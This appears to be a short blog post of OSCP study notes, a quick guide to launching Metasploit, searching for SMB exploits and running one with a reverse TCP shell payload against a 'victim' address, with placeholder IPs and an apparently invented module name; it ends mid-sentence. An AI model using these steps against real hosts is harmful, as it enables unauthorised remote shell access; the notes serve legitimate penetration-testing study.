metasploit photoThese are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Ensure postgresql is running.

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:

$> sudo update-rc.d postgresql enable

From the command line, fire up the Metasploit console:

$> msfconsole

Search for exploits related to what you are interested in:

msf> search smb

Or, be more specific:

msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from regular command line, outside of MSF):

$> searchsploit smb

Once you find an exploit you want to use, use it:

msf> use exploit/windows/smb_hack

Then set a payload:

msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:

msf> show options

Set options as needed:

LHOST is the IP of where the victim host will send info to (your Kali VM, ex.)

msf> set LHOST 192.168.0.x

RHOST is the IP of the victim

msf> set RHOST 192.168.1.x

Default port is 80, but choose one if you wish:

msf> set RPORT 8081

Run the exploit:

msf> exploit

If trying to get a remote shell, beware that you may be looking at it if you see what you think is nothing happening. Just try executing a command and see what happens:





Photos by Christiaan008,

Quick Metasploit Guide